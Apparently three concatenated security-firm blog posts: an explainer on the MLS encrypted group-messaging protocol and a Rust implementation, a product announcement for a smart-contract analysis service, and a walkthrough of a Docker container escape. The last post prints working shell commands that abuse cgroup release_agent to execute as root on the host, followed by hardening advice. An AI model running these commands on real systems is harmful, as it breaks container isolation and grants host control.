Better Encrypted Group Chat

Broadly, an end-to-end encrypted messaging protocol is one that ensures that only the participants in a conversation, and no intermediate servers, routers, or relay systems, can read and write messages. An end-to-end encrypted group messaging protocol is one that ensures this for all participants in a conversation of three or more people.

End-to-end encrypted group messaging is a necessary problem to solve. Whether it be for limiting liability, providing verifiable client-side security, or removing a single point of failure, there are good reasons for a group messaging host to use an end-to-end encrypted protocol.

End-to-end encrypted group messaging is also a hard problem to solve. Existing solutions such as Signal, WhatsApp, and iMessage have inherent problems with scaling, which I’ll discuss in detail, that make it infeasible to conduct group chats of more than a few hundred people. The Messaging Layer Security (MLS) protocol aims to make end-to-end encrypted group chat more efficient while still providing security guarantees like forward secrecy and post-compromise security.1

To these ends, I’ve been working on molasses, a Rust implementation of MLS, designed with safety, ease-of-use, and difficulty-of-misuse in mind.

Molasses has helped refine the MLS spec

The primary contribution of molasses has been in detecting errors in the specification and other implementations through unit and interoperability testing. Molasses implements most of MLS draft 6. Why not all of draft 6? There was an error in the spec that made it impossible for members to be added to any group. This broke all the unit tests that create non-trivial groups. Errors like this are hard to catch just by reading the spec; they require some amount of automated digging. Once they are found, the necessary revisions tend to be pretty obvious, and they are swiftly incorporated into the subsequent draft.

Iterating this discovery/patching process using molasses has given me a chance to put the spec through its paces and help make things clearer. This winter internship (“winternship”) project has been a great experience, especially as a first-time IETF contributor.

How to build encrypted group chat

In this section we derive why MLS is constructed the way it is (hint: for efficiency reasons), and how it compares to other solutions (hint: it’s better).

First off, MLS works on a lower level than most chat applications. It is a protocol upon which applications can be built. For example, MLS does not govern group permissions such as who can add people to the chat (this would be done by an application using MLS under the hood). Thus, we can leave things like formal rule systems out of the conversation entirely when analyzing the protocol. Here, we’re only going to consider the sending of messages and the removal of members.

The following section makes use of cryptographic primitives such as digital signatures, Diffie-Hellman key exchange, (a)symmetric encryption, and key-derivation functions. If the reader feels underprepared in any of these areas, a quick skim of the sections in Serious Cryptography on ECIES and Authenticated Diffie-Hellman should be sufficient.

Without further ado,

A Motivating Problem

Wilna is planning a retirement party for an acquaintance, Vince. The logistics are a nightmare, so she invites her friends Xavier, Yolanda, and Zayne to help her plan. They would like to make a group chat on Slack so they can all stay on the same page, but they remember that Vince is an infrastructure manager for Slack—he can see all the messages sent over any Slack server in the world. This is a problem, since they want to give Vince a nice long vacation upstate and they want it to be a surprise. Vince’s position poses even more problems: he happens to manage every single server in town. Even if Wilna purchases her own server to mediate the group chat, Vince will be tasked with managing it, meaning that he can read everything the server stores.

What Wilna needs is a centralized end-to-end encrypted group chat, i.e., a group chat where every member can broadcast messages and read all incoming messages, but the single server that mediates these messages cannot read anything. For clarity, we’ll distinguish between application messages, which carry the textual content of what a group member wants to say to everyone else in the group, and auxiliary messages (called “Handshake messages” in MLS), which members use to manage group membership and cryptographic secrets. Since this is all mediated through one server, the members can rely on the server to broadcast their messages to the rest of the group.

With the setup out of the way, what are the options?

Solution #1: Pairwise Channels

Suppose Wilna, Xavier, Yolanda, and Zayne all know each other’s public keys for digital signatures. This means that each pair of people can do an authenticated Diffie-Hellman key exchange over some auxiliary messages and derive a shared symmetric key called the pair key. This process produces six separate pairwise channels, represented here:

If Wilna wants to send an application message m to the group, she has to encrypt it three separate times (once for each member of the group) and send all the ciphertexts:

The grey arrows represent application messages encrypted under a symmetric key.

Note that Wilna isn’t making use of the server’s ability to broadcast messages, since each member in the group can only decrypt messages encrypted under their own pair keys. Generalizing this, if there is a group of size N, sending an application message requires a member to encrypt and send N-1 times. Roughly speaking, this is how iMessage does group chat.2
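To make the pairwise-channel idea concrete, here’s a toy sketch in Python of how two members derive a shared pair key. The tiny prime-field group and the raw SHA-256 “KDF” below are illustrative stand-ins for the authenticated X25519 exchange and real key-derivation function a production client would use; do not use this for anything real.

```python
import hashlib

# Toy (insecure!) Diffie-Hellman group, standing in for X25519.
P = 2**61 - 1  # small Mersenne prime modulus, for illustration only
G = 2

def pair_key(my_priv: int, their_pub: int) -> bytes:
    # Compute the shared DH secret, then hash it down to a symmetric key.
    shared = pow(their_pub, my_priv, P)
    return hashlib.sha256(shared.to_bytes(8, "big")).digest()

# Wilna and Xavier each keep a private exponent and publish G^priv mod P
wilna_priv, xavier_priv = 123456789, 987654321
wilna_pub = pow(G, wilna_priv, P)
xavier_pub = pow(G, xavier_priv, P)

# Both ends of the channel arrive at the same symmetric pair key
assert pair_key(wilna_priv, xavier_pub) == pair_key(xavier_priv, wilna_pub)
```

Each of the six channels in the four-person group gets its own key this way, which is exactly why the per-message cost grows with the group.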

Great, so that’s just three encryptions per person. This probably takes at most a few milliseconds on a phone. What’s the issue? The issue is what about the WhatsApp group with >10,000 members where my aunts talk about who’s getting married next? Do you want them to do 9,999 encryptions every time they send something? I do, but they probably don’t. To accommodate my aunts, we need to get cleverer.

Solution #2: Sender Keys

Instead of having a key between every user in the group, let’s give every user a sender key that they use to encrypt application messages. This is roughly what Signal2, WhatsApp2, and Keybase do. If you’re a group member, you have to go through the following setup:

  1. Randomly generate your sender key
  2. For every user in the group, encrypt your sender key with your pair key that you share with that user
  3. Send every user their encrypted copy of your sender key as an auxiliary message

After the setup, which requires N-1 encryptions for each user in a group of size N (that’s Θ(N²) total auxiliary messages), we finally see some efficient behavior. To send an application message m, Wilna:

  1. Encrypts m with her sender key precisely once
  2. Broadcasts the ciphertext to the group

The grey arrows represent application messages encrypted under a symmetric key.

Although there are three arrows here, they are all the same ciphertext, so the application message only needs to be encrypted and broadcast once. Thus, after the setup phase, each outgoing application message only costs a single encryption. So we’re done, right? Wrong, of course wrong. Because…

What about Removal?

The fallacy here is that the setup phase runs once. It actually runs every time the group is modified. Suppose in the process of premeditating this “retirement party,” the group finds out that Zayne has been leaking details to Vince the whole time. Naturally, they kick Zayne out. Now Zayne still knows all the sender keys, so if he talks to Vince and gets an encrypted transcript of the group conversation that happened after his departure, he would still be able to decrypt it. This is a no-no, since Zayne has already defected. To prevent this from happening, each remaining user in the group has to create a new sender key and share it with everyone else through their pairwise channels. Again, this is Θ(N²) total auxiliary messages, which can be a lot. So if we want to tolerate tons of group modifications,3 we’re going to have to find a way to bring down the number of auxiliary messages sent during the setup phase, while still being able to keep using sender keys for application messages. A well-known secret in computer science is that when the naïve solutions of pairs and lists don’t work, there’s a next logical step:
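Counting messages makes the problem concrete. Here’s a small Python sketch (pure bookkeeping, no cryptography) of the sender-key scheme’s costs; the function names are my own:

```python
# Message counting for the sender-key scheme (no actual cryptography here).

def setup_aux_messages(n: int) -> int:
    # Each of the n members encrypts their sender key for the other n - 1
    # members over pairwise channels. This same cost is paid again after
    # every removal, since all sender keys must be replaced.
    return n * (n - 1)

def send_cost(n: int) -> int:
    # After setup, one encryption + one broadcast per application message,
    # regardless of group size.
    return 1

assert setup_aux_messages(4) == 12            # Wilna's group of four
assert setup_aux_messages(10_000) == 99_990_000  # the aunts' group
assert send_cost(10_000) == 1
```

The quadratic term is the thing the next solution attacks.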

Solution #3: Trees

We would like to have sender keys (since they make application messages efficient). We also want to be able to transmit new sender keys to subsets of the group without using too many auxiliary messages. The important insight here is that, when we remove a member, we shouldn’t need to individually send new keying information to every single remaining member like we had to in the previous solution. After all, we need to send this to the whole group minus just one person. So why not have public keys that cover large subsets of the group, and use those for sending auxiliary messages? This is exactly what the MLS ratchet tree (a.k.a. TreeKEM) affords us.

The MLS ratchet tree is a binary tree4 whose leaves correspond to members of the group, and whose non-leaf nodes, called intermediate nodes, carry a Diffie-Hellman public key and private key. Intermediate nodes don’t represent people, computers, or locations on a network; they’re just pieces of data that facilitate auxiliary message sending. We also allow nodes to be blank, meaning that they do not have an associated keypair. A node that does have an associated keypair is said to be filled. Every member in the group retains a copy of the ratchet tree, minus the private keys. Knowledge of the private keys follows the ratchet tree property:

Ratchet Tree Property If a member M is a descendant of intermediate node N, then M knows the private key of N.

*deep breath* Sender keys are derived via a key-derivation function (KDF) from the root node’s private key, and each node’s private key is derived via KDF from its most-recently updated child’s private key.5 Upon the removal of a user, new private keys are distributed to the resolutions of the copath nodes, i.e., the maximal non-blank nodes of the subtrees whose root is the sibling of an updated node.

That paragraph alone took about 10 minutes to write, so let’s just see…

A Small Example

We start off with a group like so:

Zayne wants out, so Yolanda removes him.6 To remove him, Yolanda will first blank out Zayne and all his ancestors:

The boxes with red slashes through them represent blank nodes.

Yolanda needs to contribute new keying information to the new group so that the new sender keys can be derived from the new root’s private key. To do this, she generates a new personal keypair pubY’ and privY’ and derives all her ancestors’ keypairs by iteratively applying a KDF to the private key and computing its corresponding public key (this is called “ratcheting,” whence “ratchet tree”).

The green circles indicate recently updated nodes.

But Yolanda isn’t done. Wilna and Xavier need to be told about these new keys somehow. It’s Yolanda’s job to share this info. In particular,

  1. Every member needs to get a copy of the public keys of all updated nodes (i.e., Yolanda’s own public key and all her ancestors’). This is important. The public keys are part of the shared group state, and shared group state is how a bunch of values in the MLS protocol are derived.
  2. Every member needs to get a copy of the private keys of their nearest modified ancestor. This is in order to preserve the ratchet tree property.

Remember that the end goal is still to derive the sender keys, which means that Wilna and Xavier need to be told the value of the root private key, privY'''. This will be a consequence of item two above.

Since everyone needs public keys and public keys are not secret, Yolanda can just broadcast them as unencrypted auxiliary messages. But private keys are more sensitive. She needs to encrypt them for just the members who need them. This is where we use the ratchet tree property. If she wants Wilna and Xavier to be able to read an auxiliary message containing privY''', she need only encrypt the message under pubWX, since Wilna and Xavier are descendants of the WX intermediate node, and will therefore be able to decrypt anything encrypted under pubWX.7 This describes how the auxiliary messages are sent to the rest of the group:

The solid black arrows above indicate public-key encrypted messages. The dashed arrows indicate plaintext messages. The arrows do not indicate who is doing the sending (since that’s all Yolanda). They’re just meant to illustrate where in the tree the values are coming from and whom they’re intended for.

Now Wilna and Xavier will update their view of the tree by saving the public keys and decrypting the root private key. Thus, everyone is on the same page and the ratchet tree property is preserved. Finally, everyone re-derives their sender keys, and the removal is complete:

Note that Zayne’s position remains blank after the removal. This saves the members from the computational overhead of shuffling themselves around and recomputing their ancestors’ keypairs. MLS defines two ways to prevent removed members from overcrowding the tree: it allows blank nodes to be removed from the right end of the tree after removals (not applicable in the example above), and it allows new members to be added in the position of previously removed members. So if the “party-planners” above wanted to replace Zayne, they could do so without making the tree bigger.
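Yolanda’s ratcheting step can be sketched in a few lines of Python. The labels and the use of plain SHA-256 here are stand-ins for the HKDF-based derivations the spec actually defines, and real nodes hold keypairs derived from these secrets rather than the secrets themselves:

```python
import hashlib

def kdf(secret: bytes, label: bytes) -> bytes:
    # Stand-in for the HKDF-based derivation MLS actually specifies
    return hashlib.sha256(label + secret).digest()

# Yolanda picks a fresh leaf secret; her ancestors' secrets are produced by
# iteratively applying the KDF up the tree ("ratcheting").
leaf_secret = b"yolanda-fresh-randomness"
node_secrets = []
s = leaf_secret
for _ in range(2):  # two ancestors in the four-member tree: the XY node, then the root
    s = kdf(s, b"path")
    node_secrets.append(s)

root_secret = node_secrets[-1]
# Everyone re-derives their sender keys from the new root secret
sender_key = kdf(root_secret, b"sender")
assert len(node_secrets) == 2 and sender_key != root_secret
```

The point of the structure is that each member can run the same loop starting from whichever node secret they were sent, and everyone converges on the same root secret.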

This example illustrates the smaller details in updating keys, but it doesn’t do a particularly good job at illustrating which node secrets are sent to which other nodes in the resolutions of the copath nodes. To give an idea, here’s…

A Much Bigger Example

Suppose Zayne wants to break out and go solo, but still feels the desire to be in a boy band. After cloning himself 15 times, Zayne #1 notices that one of the clones, Zayne #11, keeps hinting at breaking off and doing a solo career of his own. Zayne #1 acquiesces and removes him from the group. He sees what he’s created. Zayne #1 looks up at the stars. War soon.

Let’s see what auxiliary messages were sent when Zayne #11 was booted. In this removal process, Zayne #1 generates new secrets, ratchets them all the way up the tree, and shares them with the appropriate subtrees:

The green circles still represent the updated nodes. The solid arrows represent the private key of its tail being encrypted under the public key of its head.

Notice that on the right-hand side of the tree, since you can’t encrypt to a blank node, the root private key needs to be encrypted under three separate public keys. The dashed arrows were omitted for clarity, but it’s still true that the public keys of all the circled nodes are broadcast in this step.

With this larger example, you might start to see a pattern in how many auxiliary messages are sent per tree update. Let’s play

Can You Eyeball the Asymptotic Behavior?

We got efficient application messages with sender keys, and we’d like to say that we got efficient auxiliary messages with TreeKEM so we can call it a day. Is this true? Absolutely not, at least not entirely. Let’s first talk about the example above, where we start off with a tree whose nodes are all filled.

Removal in a Filled Tree

The Zayne example is actually worst-case removal behavior in a filled tree in terms of the number of auxiliary messages (you should prove this to yourself: what would happen if Zayne #1 removed Zayne #6 instead?). If there are N many members in the group, there are at most log(N)-1 encrypted auxiliary messages that don’t have to deal with blank nodes, and another log(N)-1 that do. Plus, there are log(N) many public keys to share. So, to complete the sage wisdom from computer scientists of days past, if you use trees, you get O(log(N)) behavior. This is way better than the quadratic number of auxiliary messages we saw in solution #2. The same WhatsApp group of kibbitzing mumehs now only takes about 3·log₂(10,000) ≈ 40 total auxiliary messages to establish a new set of sender keys (assuming a filled tree) instead of the N(N-1) ≈ 100 million total auxiliary messages required previously.
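You can check the arithmetic yourself. A quick Python comparison of the two schemes for the hypothetical 10,000-member group (function names are mine, and the TreeKEM count is the rough worst-case tally from above, not an exact protocol trace):

```python
import math

def treekem_aux_messages(n: int) -> float:
    # Worst-case removal in a filled tree: ~log(n)-1 encryptions that avoid
    # blank nodes, ~log(n)-1 more that don't, plus ~log(n) broadcast public
    # keys -- roughly 3*log2(n) auxiliary messages in total.
    return 3 * math.log2(n)

def senderkey_aux_messages(n: int) -> int:
    # Rebuilding all sender keys over pairwise channels: Theta(N^2)
    return n * (n - 1)

n = 10_000
assert round(treekem_aux_messages(n)) == 40
assert senderkey_aux_messages(n) == 99_990_000
```

Forty messages versus a hundred million is the whole argument for trees in one comparison.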

Removal in a Tree with Blanks

This logarithmic behavior is fantastic, but we only checked for the very specific case where we start with a full group and then remove one person. How efficient is it when we remove a single person from a group that already has some blanks? The good news is that it’s still better than Θ(N²). The bad news is that the worst case is… well let me just show you.

Suppose every odd-numbered Zayne was removed from the group besides Zayne #1. Finally, Zayne #2 deals the finishing blow, removing Zayne #1 and restoring peace. Here is what the update looks like:

That’s N-1 messages to remove a single person! As mentioned before, this can be a prohibitively large number of auxiliary messages for large N. Even worse, it may be possible for malicious group members to strategically remove people until the tree reaches the worst-case state, thus slowing down group operations for everyone in the group.

Dealing with this situation is an open issue, and people are actively working on resolving or at least mitigating it. As of this writing, though, there are no proposed solutions that would materially improve the worst-case behavior.

Conclusion and More Info

It’s underwhelming to end at an open issue, but this is where the protocol stands today. Efficiently updating keys is at the crux of end-to-end group messaging. The TreeKEM method, edge cases and all, is one of the most important singular contributions that MLS makes. Given that there’s still at least one open issue in the spec, you may wonder

How close is the protocol to being done?

No clue. MLS has plenty of open issues (nine as of this writing) and is being tweaked constantly. Draft 7 landed just this month, and it completely overhauled the symmetric key schedule. Inefficiencies are being shaved down as issues around authenticity, confidentiality, deniability, etc. are being patched.

What are the other implementations?

The unofficial reference implementation, mlspp, is used to create test vectors that we implementers all test against. There’s also MLS*, a project at Inria to implement and formally model the protocol in F*. And there’s even another Rust implementation, melissa, being written at Wire.

Remind me why you’re writing yet another Rust implementation?

The more implementations the better. Writing this implementation has helped find errors in mlspp and the specification itself.

Errors found in mlspp include missing important fields (missing protocol version and missing hash of WelcomeInfo, which enforces sequencing), incorrect tree addressing (using leaf indices instead of node indices and vice-versa), and incorrectly generated test vectors. Errors in the specification that we found include ambiguities (how are removed nodes pruned from the ratchet tree?), logical impossibilities (how can you add a user to the group if your WelcomeInfo doesn’t include the current decryption keys?), and deontological omissions (SHOULD8 a user verify the broadcasted pubkeys against their derived pubkeys or not?).

Ok great, but why Rust?

*cracks knuckles*

I thought it would be nice to have an MLS implementation that has a clear API (thanks to molasses’ careful design and Rust’s strong typing), memory-safe semantics (thanks to the Rust borrow checker), thorough documentation (thanks to cargo doc and molasses’ current 43% comment-code ratio), and good performance (thanks to ZERO-COST-ABSTRACTIONS). Of course, none of these features make up for the fact that molasses is not formally verified like MLS* and may never be, but hey, nobody ever complained that cotton isn’t as bulletproof as kevlar, cuz those are for different things.

How can I help?

I don’t recommend filing issues with molasses quite yet. The spec is moving too quickly and the library has to be redesigned accordingly each time. If you would like to contribute, the MLS IETF page has a mailing list where you can read and participate in discussions. The organizers are helpful and patient, and I appreciate them immensely. If you want to write your own implementation, see the implementers’ Github repo for organizing info and test vectors.

If you are interested in reading more about the protocol and seeing some of the other open issues, you should give the spec9 a read.

“I want your expertise”

Well that’s going to cost you. We offer consulting in end-to-end protocol design, engineering, and auditing. Drop us a line on our contact page if you’re interested.

Thanks for reading! If you have questions or corrections, please feel free to email me at


  1. Full post-compromise security, i.e., the problem of non-deterministically deriving all new shared data so as to make the excluded parties unable to participate, is actually not easily achieved in this scheme. There is ongoing research in characterizing how post-compromise secure MLS is after a certain number of group updates.
  2. Source. This is a fantastic paper which provides a lot of context for this article. Seriously, if you want to understand this topic better, you should read the MLS spec and this paper and compare the two, since they differ in pretty subtle but significant ways. E.g., the ART scheme used in the paper does not allow intermediate nodes to be blank, which affects confidentiality of messages sent to offline members.
  3. The problem of Removal in this article is a placeholder for (a weaker form of) post-compromise security. Here, “group modifications” includes updating key material without changing group membership.
  4. Specifically, it is a left-balanced binary tree. This is fancy computer talk for “every left subtree is full,” which itself is fancy computer talk for “it behaves good when stuffed into an array.”
  5. Both these statements are technically false, but it’s way easier to think of things this way, and it’s close enough to the truth imo. In reality, sender keys are derived from a long chain of secret values relating to group state and state transitions. Node private keys are simpler, but they are also derived from chains of other secrets called “node secrets” and “path secrets.” As always, see the spec for more details.
  6. MLS doesn’t allow users to remove themselves. This is a quirk of the protocol, but it doesn’t really affect anything.
  7. If you’re confused why I say all these keys are DH keys and then use public-key encryption, it’s because the public-key encryption in MLS is done with ECIES. More specifically, it’s HPKE.
  8. The all-caps “SHOULD” means something specific in IETF RFCs. Its meaning is governed by not one but two RFCs, which are referred to as Best Current Practice 14. The linguistic conventions of RFCs are super cool and alone make it worth skimming a few specs and paying attention to their “conventions and terminology” sections. TLS is as good a place to start as any.
  9. If you want a particularly nice reading experience, you should compile the spec yourself from source. It really is appreciably better.

SVGs of the images in this post are available.

Crytic: Continuous Assurance for Smart Contracts

Note: This blog has been reposted from Truffle Suite’s blog.

We are proud to announce our new smart contract security product: Crytic provides continuous assurance for smart contracts. The platform reports build status on every commit and runs a suite of security analyses for immediate feedback.

The beta will be open soon. Follow us on Twitter to be notified and benefit from the service as soon as possible! The first three months are free.

How Crytic will secure your smart contracts

Once connected to your GitHub repository, Crytic will continuously:

  • Run our static analyzer Slither, which detects the most common smart contracts vulnerabilities and will save you from critical mistakes.
  • Run your Truffle tests to ensure that no functional bugs are added while developing your project.

Slither will analyze your codebase for more than 60 security flaws, including reentrancy, integer overflows, race conditions, and many others. Half of these detectors are private and have never been available to the public; they can detect flaws for which public knowledge is limited and that no other tool can find. The recent GridLock bug would have been detected ahead of time using Crytic!

We built this platform for developers, so we integrated it with GitHub. It will watch every commit and branch to ensure that bugs are not added during development. In addition, Crytic will run the checks on every PR to facilitate your code review.

For every security issue found, Crytic will:

  • Show you a detailed report on the bug, including source-code highlighting.
  • Allow you to create a GitHub issue to keep track of the fixes easily.
  • Let you triage the results, so you can decide what needs to be fixed.

Quick Walkthrough

Adding Crytic to your system is straightforward: you just need to connect to your GitHub repository. We have first-class support for Truffle; it works out of the box! We also support most of the other smart contract platforms, including Embark, Dapp, and Etherlime. After adding your repository, the dashboard (Figure 1) will show you a summary of the project, like this crytic-demo:

Figure 1: The Crytic Dashboard

From now on, you will benefit from continuous security analyses.

Issue reports

Finding an issue is only the first part. Crytic will provide you with the detailed information you need to understand and fix the bug:

Figure 2: Reports provide detailed information needed to understand and fix issues

A careful reader will notice the vulnerability here: function constuctor creates a public function (with a typo!) that is callable by anyone instead of being run only at initialization. Crytic will detect these types of critical mistakes instantaneously.

Triaging issues

Once a bug has been found, the user can decide to:

  • create a GitHub issue, to easily keep track of the fix, or
  • discard the issue.

Figure 3: Crytic easily creates GitHub issues for selected reports

Crytic follows the modifications to your code and reports only new bugs that are introduced. Each new PR will be analyzed automatically:

Figure 4: Crytic is fully integrated with GitHub Pull Requests

What’s next for Crytic

We are constantly improving Crytic. Expect to see new bug detectors and new features in the future. We are planning to add:

  • Echidna and Manticore integration: to ensure your code is checked for custom security properties.
  • Automatic bug repair: Crytic will propose patches to fix the issues it finds.
  • Slither printer integration: to help visualize the underlying details of your code.
  • Delegatecall proxy checker: to prevent you from making critical—and all too common—mistakes in your upgradeability process.

Questions? Bring them to TruffleCon, and pose them to us at our booth or at our Friday workshop on automated vulnerability detection tools!

Whether or not you can make it to TruffleCon, join our slack channel (#crytic) for support, and watch @CryticCI to find out as soon as our beta is open.

Understanding Docker container escapes

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes.

Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature.

Here’s a version of the PoC that launches ps on the host:

# spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities.

Don’t run containers with --privileged. Docker includes granular settings that independently control the privileges of containers. In our experience, these critical security settings are often forgotten. It is necessary to understand how these options work to secure your containers.

In the sections that follow, we’ll walk through exactly how this “container escape” works, the insecure settings that it relies upon, and what developers should do instead.

Requirements to use this technique

In fact, --privileged provides far more permissions than needed to escape a docker container via this method. In reality, the “only” requirements are:

  1. We must be running as root inside the container
  2. The container must be run with the SYS_ADMIN Linux capability
  3. The container must lack an AppArmor profile, or otherwise allow the mount syscall
  4. The cgroup v1 virtual filesystem must be mounted read-write inside the container

The SYS_ADMIN capability allows a container to perform the mount syscall (see man 7 capabilities). Docker starts containers with a restricted set of capabilities by default and does not enable the SYS_ADMIN capability due to the security risks of doing so.

Further, Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN.

A container would be vulnerable to this technique if run with the flags: --security-opt apparmor=unconfined --cap-add=SYS_ADMIN
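If you’re unsure what a given container is actually running with, one quick check is to decode the effective-capability bitmask from inside it. This is a sketch of my own, not part of the PoC; the path comes from Linux procfs and the bit index from linux/capability.h:

```python
# Check, from inside a container, whether the current process holds
# CAP_SYS_ADMIN by decoding the CapEff bitmask in /proc/self/status
# (Linux only).
CAP_SYS_ADMIN = 21  # bit index, per linux/capability.h

def has_cap_sys_admin(status_path: str = "/proc/self/status") -> bool:
    with open(status_path) as f:
        for line in f:
            if line.startswith("CapEff:"):
                capeff = int(line.split()[1], 16)
                return bool((capeff >> CAP_SYS_ADMIN) & 1)
    raise RuntimeError("CapEff line not found")

if __name__ == "__main__":
    print("CAP_SYS_ADMIN:", has_cap_sys_admin())
```

A container started with Docker’s default capability set should report False here; one started with `--cap-add=SYS_ADMIN` or `--privileged` will report True.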

Using cgroups to deliver the exploit

Linux cgroups are one of the mechanisms by which Docker isolates containers. The PoC abuses the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.

1.4 What does notify_on_release do ?
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.

Linux Kernel documentation on cgroups v1

Refining the proof of concept

There is a simpler way to write this exploit so it works without the --privileged flag. In this scenario, we won’t have access to a read-write cgroup mount provided by --privileged. Adapting to this scenario is easy: we’ll just mount the cgroup as read-write ourselves. This adds one extra line to the exploit but requires fewer privileges.

The exploit below will execute a ps aux command on the host and save its output to the /output file in the container. It uses the same release_agent feature as the original PoC to execute on the host.

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Breaking down the proof of concept

Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.

To trigger this exploit we need a cgroup where we can create a release_agent file and trigger release_agent invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.

To do that, we create a /tmp/cgrp directory, mount the RDMA cgroup controller, and create a child cgroup (named “x” for the purposes of this example). While not every cgroup controller has been tested, this technique should work with the majority of them.

If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change rdma to memory to fix it. We’re using RDMA because the original PoC was only designed to work with it.

Note that cgroup controllers are global resources; they can be mounted multiple times with different permissions, and changes made in one mount apply to the others.

We can see the “x” child cgroup creation and its directory listing below.

root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
root@b11cf9eab4fd:/# ls /tmp/cgrp/
cgroup.clone_children  cgroup.procs  cgroup.sane_behavior  notify_on_release  release_agent  tasks  x
root@b11cf9eab4fd:/# ls /tmp/cgrp/x
cgroup.clone_children  cgroup.procs  notify_on_release  rdma.current  rdma.max  tasks

Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its notify_on_release file. We also set the RDMA cgroup release agent to execute a /cmd script — which we will later create in the container — by writing the /cmd script path on the host to the release_agent file. To do it, we’ll grab the container’s path on the host from the /etc/mtab file.

The files we add or modify in the container are present on the host, and it is possible to modify them from both sides: via their path in the container and via their path on the host.

Those operations can be seen below:

root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

Note the host path of the /cmd script, which we are about to create in the container:

root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent

Now, we create the /cmd script such that it will execute the ps aux command and save its output into /output in the container, by specifying the full path of the output file on the host. At the end, we also print the /cmd script to see its contents:

root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
root@b11cf9eab4fd:/# chmod a+x /cmd
root@b11cf9eab4fd:/# cat /cmd
ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output

Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a /bin/sh process and writing its PID to the cgroup.procs file in the “x” child cgroup directory, the script on the host will execute after /bin/sh exits. The output of ps aux performed on the host is then saved to the /output file inside the container:

root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
root@b11cf9eab4fd:/# head /output
root         1  0.1  1.0  17564 10288 ?        Ss   13:57   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    13:57   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_gp]
root         4  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_par_gp]
root         6  0.0  0.0      0     0 ?        I<   13:57   0:00 [kworker/0:0H-kblockd]
root         8  0.0  0.0      0     0 ?        I<   13:57   0:00 [mm_percpu_wq]
root         9  0.0  0.0      0     0 ?        S    13:57   0:00 [ksoftirqd/0]
root        10  0.0  0.0      0     0 ?        I    13:57   0:00 [rcu_sched]
root        11  0.0  0.0      0     0 ?        S    13:57   0:00 [migration/0]

Use containers securely

Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the --privileged flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.

To help keep containers secure:

  • Do not use the --privileged flag or mount a Docker socket inside the container. The Docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the --privileged flag.
  • Do not run as root inside the container. Use a different user or user namespaces. Root in the container is the same as root on the host unless remapped with user namespaces; it is only lightly restricted, primarily by Linux namespaces, capabilities, and cgroups.
  • Drop all capabilities (--cap-drop=all) and enable only those that are required (--cap-add=...). Many workloads don’t need any capabilities, and adding them increases the scope of a potential attack.
  • Use the “no-new-privileges” security option to prevent processes from gaining more privileges, for example through suid binaries.
  • Limit resources available to the container. Resource limits can protect the machine from denial of service attacks.
  • Adjust seccomp, AppArmor (or SELinux) profiles to restrict the actions and syscalls available for the container to the minimum required.
